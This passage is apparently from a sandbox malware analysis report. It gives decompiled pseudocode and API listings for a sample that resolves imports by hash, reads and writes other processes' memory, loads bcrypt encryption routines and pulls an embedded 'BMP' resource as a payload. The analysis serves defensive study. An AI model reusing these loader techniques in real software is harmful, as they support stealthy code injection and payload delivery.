								_t29 = _t35;
								if( *_t35 != 0) {
									do {
										_t41 =  *_t29 & 0x0000ffff;
										if(_t41 >= 0x41 && _t41 <= 0x5a) {
											 *_t29 = _t41 + 0x20;
										}
										_t29 =  &(_t29[1]);
									} while ( *_t29 != 0);
								}
								_t39 =  *(_t45 + 0x2c) & 0x0000ffff;
								_t47 = _t46 | 0xffffffff;
								_t44 = _t35;
								if(_t39 != 0) {
									do {
										_t32 =  *_t44 & 0x000000ff;
										_t44 =  &(_t44[1]);
										_t47 = _t47 >> 0x00000008 ^  *(0x1001ae10 + ((_t32 ^ _t47) & 0x000000ff) * 4);
										_t39 = _t39 - 1;
									} while (_t39 != 0);
								}
								E1000493E(_t35);
								_t46 =  !_t47;
								_t51 = _t52 + 4;
								if(_t46 ==  *((intOrPtr*)(_t51 + 0x14))) {
									return  *((intOrPtr*)(_t45 + 0x18));
								} else {
									goto L15;
								}
							}
							goto L18;
							L15:
							_t45 =  *_t45;
						}
					}
					goto L16;
				}
				L18:
			}

















    0x10013cbc
    0x10013ccd
    0x10013cd2
    0x10013cd9
    0x10013dd5
    0x10013dde
    0x10013cdf
    0x10013ce3
    0x10013cee
    0x10013cf2
    0x10013cfd
    0x10013d00
    0x10013d0a
    0x10013d0f
    0x10013d13
    0x10013d20
    0x10013d23
    0x10013d28
    0x10013d34
    0x10013d3a
    0x10013d3c
    0x10013d41
    0x00000000
    0x10013d47
    0x10013d4f
    0x10013d5d
    0x10013d62
    0x10013d65
    0x10013d6b
    0x10013d70
    0x10013d70
    0x10013d76
    0x10013d80
    0x10013d80
    0x10013d83
    0x10013d86
    0x10013d70
    0x10013d8c
    0x10013d90
    0x10013d93
    0x10013d97
    0x10013da0
    0x10013da0
    0x10013da3
    0x10013dae
    0x10013db5
    0x10013db5
    0x10013da0
    0x10013dbb
    0x10013dc0
    0x10013dc2
    0x10013dc9
    0x10013de9
    0x00000000
    0x00000000
    0x00000000
    0x10013dc9
    0x00000000
    0x10013dcb
    0x10013dcb
    0x10013dcd
    0x10013d28
    0x00000000
    0x10013d13
    0x00000000

    APIs
    • GetModuleHandleW.KERNEL32(ntdll.dll,?,771CF162,?,?,?,?,?,10011147,?,?,100111E0), ref: 10013CC0
    • NtQueryInformationProcess.NTDLL(000000FF,00000000,?,?,?,?,?,?,00000018,?), ref: 10013D0F
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 100145E0, Relevance: 4.6, APIs: 3, Instructions: 59native
    C-Code - Quality: 59%
    			E100145E0(intOrPtr* __ecx, intOrPtr __edx) {
				void _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				union _PROCESSINFOCLASS _v40;
				long _v44;
				char _v48;
				char _v56;
				intOrPtr _v60;
				intOrPtr _t15;
				long _t21;
				char _t22;
				void* _t26;
				intOrPtr _t30;
				intOrPtr* _t31;

				_t31 = __ecx;
				_t30 = __edx;
				if( *__ecx != 1) {
					_t26 = GetCurrentProcess();
				} else {
					_t1 = _t31 + 4; // 0xccde0
					_t26 =  *( *_t1);
				}
				_v32 = _t30;
				_v28 = 0x1001f2d0;
				_v40 = 0;
				_v36 = _t31;
				_t15 =  *_t31;
				if(_t15 == 0) {
					__imp__RtlGetCurrentPeb();
					asm("movups xmm0, [eax]");
					asm("movups [edi], xmm0");
					return 1;
				} else {
					if(_t15 != 1) {
						L9:
						return 0;
					} else {
						_t21 = NtQueryInformationProcess(_t26, 0,  &_v24, 0x18,  &_v44); // executed
						if(_t21 < 0 || _v60 != 0x18) {
							goto L9;
						} else {
							_t22 = _v36;
							if(_t22 == 0) {
								goto L9;
							} else {
								_v56 = _t22;
								return E10014010( &_v48,  &_v56, 0x10);
							}
						}
					}
				}
			}


















    0x100145e4
    0x100145e7
    0x100145ec
    0x100145fb
    0x100145ee
    0x100145ee
    0x100145f1
    0x100145f1
    0x100145ff
    0x10014603
    0x1001460b
    0x10014613
    0x10014617
    0x1001461a
    0x1001466d
    0x10014673
    0x1001467b
    0x10014683
    0x1001461c
    0x1001461f
    0x10014665
    0x1001466c
    0x10014621
    0x10014630
    0x10014638
    0x00000000
    0x10014641
    0x10014641
    0x10014647
    0x00000000
    0x10014649
    0x1001464f
    0x10014664
    0x10014664
    0x10014647
    0x10014638
    0x1001461f

    APIs
    • GetCurrentProcess.KERNEL32(00000001,00001DB1), ref: 100145F5
    • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,?), ref: 10014630
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 10014059
      • Part of subcall function 10014010: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1001407C
      • Part of subcall function 10014010: WriteProcessMemory.KERNEL32(?,1001F2D0,?,?,00000000), ref: 100140A2
      • Part of subcall function 10014010: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,10014919,000CAA50), ref: 100140B9
      • Part of subcall function 10014010: LocalFree.KERNEL32(?,10012590), ref: 100140F3
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,?,?), ref: 10014120
      • Part of subcall function 10014010: ReadFile.KERNEL32(?,1001F2D0,?,?,00000000), ref: 10014140
      • Part of subcall function 10014010: ReadProcessMemory.KERNELBASE(?,?,1001F2D0,?,00000000), ref: 1001415F
    • RtlGetCurrentPeb.NTDLL ref: 1001466D
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 00C51BE9, Relevance: 1.5, APIs: 1, Instructions: 3
    C-Code - Quality: 100%
    			E00C51BE9() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00C51BF5); // executed
				return _t1;
			}




    0x00c51bee
    0x00c51bf4

    APIs
    • SetUnhandledExceptionFilter.KERNEL32(Function_00001BF5), ref: 00C51BEE
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 10011BF1, Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 72library

    Control-flow Graph

    C-Code - Quality: 95%
    			E10011BF1(intOrPtr* __eax, void* __ecx, intOrPtr* __edi, void* __esi) {
				_Unknown_base(*)()* _t4;
				intOrPtr _t5;
				struct HINSTANCE__* _t7;
				intOrPtr _t15;

				 *__edi =  *__edi + __ecx;
				 *__eax =  *__eax + __eax;
				_t1 = __ecx + 0x1f2383d;
				 *_t1 =  *((intOrPtr*)(__ecx + 0x1f2383d)) + __eax;
				asm("adc [eax], al");
				if( *_t1 != 0) {
					_t4 =  *0x1001f234; // 0x74ee2391
					goto L5;
				} else {
					_t7 = LoadLibraryW(L"bcrypt"); // executed
					 *0x1001f238 = _t7;
					if(_t7 == 0) {
						L14:
						_t5 =  *0x1001daa0; // 0x0
						return _t5;
					} else {
						 *0x1001f23c = GetProcAddress(_t7, "BCryptOpenAlgorithmProvider");
						 *0x1001f22c = GetProcAddress( *0x1001f238, "BCryptSetProperty");
						 *0x1001f24c = GetProcAddress( *0x1001f238, "BCryptGetProperty");
						 *0x1001f248 = GetProcAddress( *0x1001f238, "BCryptGenerateSymmetricKey");
						 *0x1001f240 = GetProcAddress( *0x1001f238, "BCryptEncrypt");
						 *0x1001f244 = GetProcAddress( *0x1001f238, "BCryptDecrypt");
						 *0x1001f230 = GetProcAddress( *0x1001f238, "BCryptDestroyKey");
						_t4 = GetProcAddress( *0x1001f238, "BCryptCloseAlgorithmProvider");
						 *0x1001f234 = _t4;
						if( *0x1001f238 != 0) {
							L5:
							if( *0x1001f23c != 0 &&  *0x1001f22c != 0 &&  *0x1001f24c != 0 &&  *0x1001f248 != 0 &&  *0x1001f240 != 0 &&  *0x1001f244 != 0 &&  *0x1001f230 != 0 && _t4 != 0) {
								 *0x1001daa0 = E10011AD0();
							}
							goto L14;
						} else {
							_t15 =  *0x1001daa0; // 0x0
							return _t15;
						}
					}
				}
			}







    0x10011bf6
    0x10011bfa
    0x10011bfc
    0x10011bfc
    0x10011c02
    0x10011c04
    0x10011cc4
    0x00000000
    0x10011c0a
    0x10011c0f
    0x10011c15
    0x10011c1c
    0x10011d16
    0x10011d16
    0x10011d1b
    0x10011c22
    0x10011c3c
    0x10011c4e
    0x10011c60
    0x10011c72
    0x10011c84
    0x10011c96
    0x10011ca8
    0x10011cad
    0x10011cb6
    0x10011cbc
    0x10011cc9
    0x10011cd0
    0x10011d11
    0x10011d11
    0x00000000
    0x10011cbe
    0x10011cbe
    0x10011cc3
    0x10011cc3
    0x10011cbc
    0x10011c1c

    APIs
    • LoadLibraryW.KERNEL32(bcrypt), ref: 10011C0F
    • GetProcAddress.KERNEL32(00000000,BCryptOpenAlgorithmProvider), ref: 10011C2F
    • GetProcAddress.KERNEL32(BCryptSetProperty), ref: 10011C41
    • GetProcAddress.KERNEL32(BCryptGetProperty), ref: 10011C53
    • GetProcAddress.KERNEL32(BCryptGenerateSymmetricKey), ref: 10011C65
    • GetProcAddress.KERNEL32(BCryptEncrypt), ref: 10011C77
    • GetProcAddress.KERNEL32(BCryptDecrypt), ref: 10011C89
    • GetProcAddress.KERNEL32(BCryptDestroyKey), ref: 10011C9B
    • GetProcAddress.KERNEL32(BCryptCloseAlgorithmProvider), ref: 10011CAD
      • Part of subcall function 10011AD0: LocalAlloc.KERNEL32(00000040), ref: 10011B3E
      • Part of subcall function 10011AD0: LocalAlloc.KERNEL32(00000040), ref: 10011BAD
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 10011AD0, Relevance: 15.1, APIs: 2, Strings: 8, Instructions: 65

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 17 10011ad0-10011ae7 19 10011aed-10011b09 17->19 20 10011bbb-10011bbc 17->20 19->20 22 10011b0f-10011b30 19->22 22->20 24 10011b36-10011b52 LocalAlloc 22->24 25 10011b5d-10011b5f 24->25 25->20 26 10011b61-10011b7d 25->26 26->20 28 10011b7f-10011ba3 26->28 30 10011bba 28->30 31 10011ba5-10011bb8 LocalAlloc 28->31 30->20 31->30
    APIs
    • LocalAlloc.KERNEL32(00000040), ref: 10011B3E
    • LocalAlloc.KERNEL32(00000040), ref: 10011BAD
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 1000AF1F, Relevance: 12.2, APIs: 8, Instructions: 216

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 32 1000af1f-1000af38 33 1000af4e-1000af53 32->33 34 1000af3a-1000af4a call 1000e213 32->34 35 1000af60-1000af84 MultiByteToWideChar 33->35 36 1000af55-1000af5d 33->36 34->33 44 1000af4c 34->44 38 1000af8a-1000af96 35->38 39 1000b117-1000b12a call 10001b26 35->39 36->35 41 1000afea 38->41 42 1000af98-1000afa9 38->42 47 1000afec-1000afee 41->47 45 1000afc8-1000afd9 call 10005da1 42->45 46 1000afab-1000afba call 10010250 42->46 44->33 49 1000b10c 45->49 58 1000afdf 45->58 46->49 60 1000afc0-1000afc6 46->60 47->49 50 1000aff4-1000b007 MultiByteToWideChar 47->50 54 1000b10e-1000b115 call 1000b187 49->54 50->49 53 1000b00d-1000b01f call 10006b9a 50->53 61 1000b024-1000b028 53->61 54->39 63 1000afe5-1000afe8 58->63 60->63 61->49 64 1000b02e-1000b035 61->64 63->47 65 1000b06f-1000b07b 64->65 66 1000b037-1000b03c 64->66 67 1000b07d-1000b08e 65->67 68 1000b0c7 65->68 66->54 69 1000b042-1000b044 66->69 71 1000b090-1000b09f call 10010250 67->71 72 1000b0a9-1000b0ba call 10005da1 67->72 70 1000b0c9-1000b0cb 68->70 69->49 73 1000b04a-1000b064 call 10006b9a 69->73 74 1000b0cd-1000b0e6 call 10006b9a 70->74 75 1000b105-1000b10b call 1000b187 70->75 71->75 88 1000b0a1-1000b0a7 71->88 72->75 85 1000b0bc 72->85 73->54 86 1000b06a 73->86 74->75 89 1000b0e8-1000b0ef 74->89 75->49 90 1000b0c2-1000b0c5 85->90 86->49 88->90 91 1000b12b-1000b131 89->91 92 1000b0f1-1000b0f2 89->92 90->70 93 1000b0f3-1000b103 WideCharToMultiByte 91->93 92->93 93->75 94 1000b133-1000b13a call 1000b187 93->94 94->54
    C-Code - Quality: 69%
    			E1000AF1F(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x1001d018; // 0x26c1db24
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E1000E213(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E10001B26(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E1000B187(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E10006B9A(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0); // executed
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E1000B187(_t101);
									goto L36;
								}
								_t62 = E10006B9A(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E1000B187(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E10005DA1(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E10010250();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E10006B9A(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E10005DA1(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E10010250();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}


























    0x1000af24
    0x1000af25
    0x1000af26
    0x1000af2d
    0x1000af31
    0x1000af32
    0x1000af38
    0x1000af3e
    0x1000af44
    0x1000af47
    0x1000af47
    0x1000af4a
    0x1000af4c
    0x1000af4c
    0x1000af4a
    0x1000af4e
    0x1000af53
    0x1000af5a
    0x1000af5d
    0x1000af5d
    0x1000af79
    0x1000af7f
    0x1000af84
    0x1000b117
    0x1000b12a
    0x1000af8a
    0x1000af8a
    0x1000af8d
    0x1000af92
    0x1000af96
    0x1000afea
    0x1000afea
    0x1000afec
    0x1000afee
    0x1000b10c
    0x1000b10c
    0x1000b10e
    0x1000b10f
    0x00000000
    0x1000b115
    0x1000afff
    0x1000b005
    0x1000b007
    0x00000000
    0x00000000
    0x1000b00d
    0x1000b01f
    0x1000b024
    0x1000b028
    0x00000000
    0x00000000
    0x1000b035
    0x1000b06f
    0x1000b072
    0x1000b075
    0x1000b077
    0x1000b079
    0x1000b07b
    0x1000b0c7
    0x1000b0c7
    0x1000b0c9
    0x1000b0c9
    0x1000b0cb
    0x1000b105
    0x1000b106
    0x00000000
    0x1000b10b
    0x1000b0df
    0x1000b0e4
    0x1000b0e6
    0x00000000
    0x00000000
    0x1000b0ea
    0x1000b0eb
    0x1000b0ec
    0x1000b0ef
    0x1000b12b
    0x1000b12e
    0x1000b0f1
    0x1000b0f1
    0x1000b0f2
    0x1000b0f2
    0x1000b0ff
    0x1000b101
    0x1000b103
    0x1000b134
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x1000b103
    0x1000b07d
    0x1000b080
    0x1000b082
    0x1000b084
    0x1000b086
    0x1000b089
    0x1000b08e
    0x1000b0a9
    0x1000b0ab
    0x1000b0b5
    0x1000b0b7
    0x1000b0b8
    0x1000b0ba
    0x00000000
    0x00000000
    0x1000b0bc
    0x1000b0c2
    0x1000b0c2
    0x00000000
    0x1000b0c2
    0x1000b090
    0x1000b092
    0x1000b096
    0x1000b09b
    0x1000b09d
    0x1000b09f
    0x00000000
    0x00000000
    0x1000b0a1
    0x00000000
    0x1000b0a1
    0x1000b037
    0x1000b03c
    0x00000000
    0x00000000
    0x1000b042
    0x1000b044
    0x00000000
    0x00000000
    0x1000b05b
    0x1000b060
    0x1000b064
    0x00000000
    0x00000000
    0x00000000
    0x1000b06a
    0x1000af9d
    0x1000af9f
    0x1000afa1
    0x1000afa9
    0x1000afc8
    0x1000afca
    0x1000afd4
    0x1000afd6
    0x1000afd7
    0x1000afd9
    0x00000000
    0x00000000
    0x1000afdf
    0x1000afe5
    0x1000afe5
    0x00000000
    0x1000afe5
    0x1000afad
    0x1000afb1
    0x1000afb6
    0x1000afba
    0x00000000
    0x00000000
    0x1000afc0
    0x00000000
    0x1000afc0

    APIs
    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,00000000,1000405A,1000405A,?,?,?,1000B170,00000001,00000001,1BE85006), ref: 1000AF79
    • __alloca_probe_16.NTDLLP ref: 1000AFB1
    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,1000B170,00000001,00000001,1BE85006,?,?,?), ref: 1000AFFF
      • Part of subcall function 10006B9A: LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,1BE85006,00000001,?,000000FF), ref: 10006C0B
    • __alloca_probe_16.NTDLLP ref: 1000B096
      • Part of subcall function 10005DA1: RtlAllocateHeap.NTDLL(00000000,00000001,00000004,?,1000DDBB,00000001,00000000,?,10009B15,00000001,00000004,00000000,00000001,?,?,10005AA6), ref: 10005DD3
    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 1000B0F9
    • __freea.LIBCMT ref: 1000B106
    • __freea.LIBCMT ref: 1000B10F
      • Part of subcall function 10001B26: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10001B6A
    • __freea.LIBCMT ref: 1000B134
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 10014010, Relevance: 12.2, APIs: 8, Instructions: 153file

    Control-flow Graph

    C-Code - Quality: 100%
    			E10014010(void** __ecx, void** __edx, long _a4) {
				intOrPtr _v4;
				LONG* _v8;
				long _v12;
				void _t28;
				void _t30;
				void* _t33;
				int _t35;
				LONG* _t36;
				void* _t43;
				void* _t45;
				long _t54;
				LONG* _t61;
				void* _t67;
				void* _t68;

				_t74 = __ecx;
				_v4 = 0x1001f2d0;
				_t61 = 0;
				_t75 = __edx;
				_v8 = 0;
				_t3 =  &(_t74[1]); // 0x0
				_t67 =  *_t3;
				_t28 =  *_t67;
				if(_t28 == 0) {
					_t68 = __edx[1];
					_t30 =  *_t68;
					if(_t30 == 0) {
						E10010340( *__ecx,  *__edx, _a4);
						_t61 = 1;
						goto L20;
					} else {
						_t33 = _t30 - 1;
						if(_t33 == 0) {
							_t35 = ReadProcessMemory( *( *(_t68 + 4)),  *__edx,  *__ecx, _a4, 0); // executed
							return _t35;
						} else {
							_t36 = _t33 - 5;
							if(_t36 != 0 || SetFilePointer( *( *(_t68 + 4)),  *__edx, _t36, _t36) == 0xffffffff) {
								goto L20;
							} else {
								return ReadFile( *( *(_t75[1] + 4)),  *_t74, _a4,  &_v12, 0);
							}
						}
					}
				} else {
					_t43 = _t28 - 1;
					if(_t43 == 0) {
						if( *(__edx[1]) != 0) {
							goto L9;
						} else {
							return WriteProcessMemory( *( *(_t67 + 4)),  *__ecx,  *__edx, _a4, 0);
						}
					} else {
						if(_t43 != 5) {
							L20:
							return _t61;
						} else {
							if( *(__edx[1]) != 0) {
								L9:
								_t76 = _a4;
								_t45 = LocalAlloc(0x40, _a4);
								_v8 = _t45;
								if(_t45 == 0) {
									goto L20;
								} else {
									if(E10014010( &_v8, _t75, _t76) != 0) {
										_t61 = E10014010(_t74,  &_v8, _t76);
									}
									LocalFree(_v8);
									return _t61;
								}
							} else {
								_t54 =  *__ecx;
								if(_t54 == 0 || SetFilePointer( *( *(_t67 + 4)), _t54, 0, 0) != 0) {
									_t7 =  &(_t74[1]); // 0x0
									return WriteFile( *( *( *_t7 + 4)),  *_t75, _a4,  &_v12, 0);
								} else {
									goto L20;
								}
							}
						}
					}
				}
			}

















    0x10014017
    0x10014019
    0x10014021
    0x10014023
    0x10014025
    0x10014029
    0x10014029
    0x1001402e
    0x10014030
    0x10014103
    0x10014108
    0x1001410b
    0x10014177
    0x1001417f
    0x00000000
    0x1001410d
    0x1001410d
    0x10014110
    0x1001415f
    0x1001416e
    0x10014112
    0x10014112
    0x10014115
    0x00000000
    0x1001412b
    0x1001414f
    0x1001414f
    0x10014115
    0x10014110
    0x10014036
    0x10014036
    0x10014039
    0x10014091
    0x00000000
    0x10014093
    0x100140b1
    0x100140b1
    0x1001403b
    0x1001403e
    0x10014187
    0x1001418d
    0x10014044
    0x10014049
    0x100140b2
    0x100140b2
    0x100140b9
    0x100140bf
    0x100140c5
    0x00000000
    0x100140cb
    0x100140dc
    0x100140ed
    0x100140ed
    0x100140f3
    0x10014102
    0x10014102
    0x1001404b
    0x1001404b
    0x1001404f
    0x1001406e
    0x1001408b
    0x00000000
    0x00000000
    0x00000000
    0x1001404f
    0x10014049
    0x1001403e
    0x10014039

    APIs
    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,10014919,000CAA50), ref: 100140B9
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 10014059
      • Part of subcall function 10014010: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1001407C
      • Part of subcall function 10014010: WriteProcessMemory.KERNEL32(?,1001F2D0,?,?,00000000), ref: 100140A2
      • Part of subcall function 10014010: LocalFree.KERNEL32(?,10012590), ref: 100140F3
    • SetFilePointer.KERNEL32(?,?,?,?), ref: 10014120
    • ReadFile.KERNEL32(?,1001F2D0,?,?,00000000), ref: 10014140
    • ReadProcessMemory.KERNELBASE(?,?,1001F2D0,?,00000000), ref: 1001415F
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 00C61BE0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 185 c61be0-c61bea 186 c61c82-c61c88 185->186 187 c61bf0-c61c0a GetModuleHandleW 185->187 188 c61c0c-c61c11 187->188 189 c61c12-c61c25 FindResourceW 187->189 190 c61c5c-c61c64 189->190 191 c61c27-c61c31 LoadResource 189->191 191->190 192 c61c33-c61c3f LockResource 191->192 192->190 193 c61c41-c61c4d SizeofResource 192->193 193->190 194 c61c4f-c61c5a call c619c0 193->194 194->190 197 c61c65-c61c81 call c5df30 194->197
    C-Code - Quality: 95%
    			E00C61BE0(void* __ecx, WCHAR** _a4) {
				void* _v8;
				struct HINSTANCE__* _t7;
				struct HRSRC__* _t8;
				void* _t10;
				void* _t11;
				struct HRSRC__* _t17;
				struct HINSTANCE__* _t24;
				WCHAR* _t26;
				WCHAR** _t30;

				_push(__ecx);
				_t30 = _a4;
				if(_t30 == 0) {
					return 0;
				} else {
					_t30[1] = 0;
					 *_t30 = 0;
					_t7 = GetModuleHandleW(0);
					_t24 = _t7;
					if(_t24 != 0) {
						_t8 = FindResourceW(_t24, 0x65, "BMP"); // executed
						_t17 = _t8;
						if(_t17 == 0) {
							L8:
							return 0;
						} else {
							_t10 = LoadResource(_t24, _t17);
							if(_t10 == 0) {
								goto L8;
							} else {
								_t11 = LockResource(_t10);
								_v8 = _t11;
								if(_t11 == 0) {
									goto L8;
								} else {
									_t26 = SizeofResource(_t24, _t17);
									if(_t26 == 0 || E00C619C0(_t26, _t30) == 0) {
										goto L8;
									} else {
										E00C5DF30( *_t30, _v8, _t26);
										_t30[1] = _t26;
										return 1;
									}
								}
							}
						}
					} else {
						return _t7;
					}
				}
			}












    0x00c61be3
    0x00c61be5
    0x00c61bea
    0x00c61c88
    0x00c61bf0
    0x00c61bf3
    0x00c61bfa
    0x00c61c00
    0x00c61c06
    0x00c61c0a
    0x00c61c1b
    0x00c61c21
